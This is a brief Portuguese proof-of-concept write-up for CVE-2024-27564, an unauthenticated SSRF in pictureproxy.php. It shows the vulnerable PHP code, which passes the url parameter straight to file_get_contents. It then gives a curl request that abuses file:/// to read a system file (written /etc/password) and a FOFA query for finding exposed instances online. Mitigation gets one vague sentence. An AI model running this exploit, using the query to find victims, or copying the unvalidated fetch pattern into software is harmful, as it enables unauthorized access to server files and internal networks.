
Prova de conceito para CVE-2024-27564, um SSRF não autenticado em pictureproxy.php através do parâmetro url, com código vulnerável, PoC em curl e notas de mitigação.
Uma vulnerabilidade em pictureproxy.php permite que atacantes remotos realizem requisições arbitrárias ao injetar URLs no parâmetro url. Essa vulnerabilidade de SSRF pode ser explorada sem autenticação, tornando-a particularmente perigosa.
O código vulnerável está no arquivo pictureproxy.php. O problema ocorre porque a função não valida adequadamente o parâmetro url. A variável $_GET['url'] é passada para a função file_get_contents(), que busca conteúdo da URL especificada. Isso pode levar a SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Requisição Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
É necessário um gerenciamento adequado da validação de entrada.